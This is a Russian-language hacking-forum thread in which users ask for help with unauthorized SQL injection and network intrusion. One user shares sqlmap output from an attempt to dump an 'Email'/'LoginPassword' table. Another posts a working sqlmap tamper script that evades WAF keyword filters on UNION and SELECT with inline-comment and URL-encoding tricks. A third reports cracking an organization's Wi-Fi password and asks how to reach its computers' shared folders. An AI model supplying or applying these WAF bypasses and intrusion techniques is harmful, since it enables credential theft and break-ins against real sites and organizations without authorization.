ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Чеп прикрыть USB технике что в офисе, не разбирая, не испортив?

Где найти нормальной информации про защиту инфы в компаний?

пообщаться с опытным CISO большой компании.

на линкедине полно контактов.

Подскажи плз тампер для обхода этого ваф WAF/IPS identified as 'ASP.NET RequestValidationMode (Microsoft)

а то при сливе выдает:

| Email | LoginPassword |

+-------+---------------+

| NULL | NULL |

| NULL | NULL |

| NULL | NULL |

| NULL | NULL |

| NULL | NULL |

| NULL | NULL |

| NULL | NULL |

| NULL | NULL |

скажи,что может мешать WAF.Буду благодарен и за другие советы по этой проблемке

P.S новичок в этом,если не затруднит,то можно развернутый ответ для "особо одаренных" =))

Руками надо смотреть на что ругается ВАФ и потом уже искать обход.

Почитай и попробуй варианты

https://hydrasky.com/network-securit...ss-cheatsheet/

http://www.securityidiots.com/Web-Pe...de-part-1.html

https://medium.com/@drag0n/sqlmap-ta...s-c5a3f5764cb3

Прошу помощи в раскрутке скули

Что есть? Сайт написанный на Coldfusion, юнион и булеан типы, скуля в гет параметре

Кручу мапом, мап видит булеан, через ордер бай понимает что есть и юнион, видит что там 3 колонки и натыкается на ваф

Ругается на слово union, select пропускает

Мап не может определить даже тип субд из-за того что ваф не пропускает его дальше

Ошибка вафа :

You are not permitted to run URL SQL Statements on this server. Your IP address has been logged and e-mailed to our administrator.

Пробовал юрл энкод, двойной юрл энкод, почти все тамперы которые хоть как-то могли помочь

Пробуй обойти ваф руками, потом пиши свой тампер на этот ваф, вот как пример

.SpoilerTarget" type="button">Spoiler
#!/usr/bin/env python

"""

Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)

See the file 'doc/COPYING' for copying permission

"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

def dependencies():

pass

def tamper(payload, **kwargs):

"""

........

"""

if payload:

payload = payload.replace("INFORMATION_SCHEMA.TABLES", "/*!12345%49NFORMATION_SCHEMA.TABLES*/")

payload = payload.replace("table_schema", "/*!12345%74able_schema*/")

payload = payload.replace("table_name", "/*!12345%74able_name*/")

payload = payload.replace("UNION", "/*!12345%75NION*/")

payload = payload.replace("SELECT", "/*!12345%73ELECT*/")

payload = payload.replace("SCHEMA", "%73CHEMA")

payload = payload.replace("schema", "%73chema")

payload = payload.replace("from", "/*!12345from*/")

return payload
дальше кладешь в папочку tamper/my_tamper.py и вызываешь --tamper="my_tamper"

Да, это все я понимаю, дело в том, что я руками не могу, все варианты провалились, это MSSQL как оказалось

С которым у меня не так много опыта, буду благодарен за любую помощь

Всем доброго вечера! Подскажите, подобрал пароль к wi-fi роутеру организации, видно локальную сеть из 5 устройств и одного принтера. Компы на винде 7. Есть ли возможность проникнуть в расшаренные папки? ибо при попытке захода на удаленный комп внутри ЛВС требуется пароль и логин. Пароль требует только к компу админа, а остальные компы видны только как медиапроигрыватели